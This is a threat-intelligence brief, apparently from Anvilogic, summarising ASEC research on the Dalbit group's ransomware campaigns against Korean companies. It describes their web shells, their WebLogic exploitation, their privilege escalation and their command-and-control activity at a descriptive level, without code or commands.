2023-02-23

Dalbit Threat Group Runs Attack Campaigns Against Korean Companies

Level: 
Tactical
  |  Source: 
ASEC
Automotive
Chemical
Construction
Consulting
Education
Energy
Food and Beverage
Hospitality
Industrial
Manufacturing
Media
Retail
Technology
Transportation
Share:

Dalbit Threat Group Runs Attack Campaigns Against Korean Companies

Category: Threat Actor Activity | Industries: Automotive, Chemical, Construction, Consulting, Education, Energy, Food & Beverage, Hospitality, Industrial, Manufacturing, Media, Retail, Technology, Transportation | Level: Tactical | Source: ASEC

Researchers from the ASEC analysis team report threat group tracked as Dalbit, targeting Korean companies to launch ransomware. Since 2022, Dalbit is responsible for at least 50 attacks against various industries including technology, industrial, chemical, construction, automotive, manufacturing, education, media, and others. The majority of the companies attacked are categorized as mid to small-sized companies. Several of the tools frequently deployed by Dalbit came from the Chinese community, and like a proxy tool are assessed to have "a partial connection with China."

To obtain initial access, the attackers often target vulnerabilities dropping WebShells including Godzilla, ASPXSpy, AntSword, and China Chopper. "In particular, 30% of the affected companies were found to have been using a certain Korean groupware product." Dalbit actors are documented to have exploited WebLogic vulnerability, CVE-2017-10271. With access to the environment, Dalbit operators drop tools using certutil and Bitsadmin aiding with privilege escalation, reconnaissance, and command and control (C2) communication. Following privilege escalation with the range of Potato exploits (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato), operators disabled firewall settings and added a new account for persistence. With escalated privileges and lowered network defenses, the threat actors set up C2 communication with their proxy tool and proceed to collect credentials, emails, and other valuable data for extortion.

Anvilogic Scenario:

  • Abuse of Native Processes Leads to Actions on Objectives

Anvilogic Use Cases:

  • WebLogic CVE-2017-10271
  • Potential Web Shell
  • China Chopper Web Shell

Get trending threats published weekly by the Anvilogic team.

Sign Up Now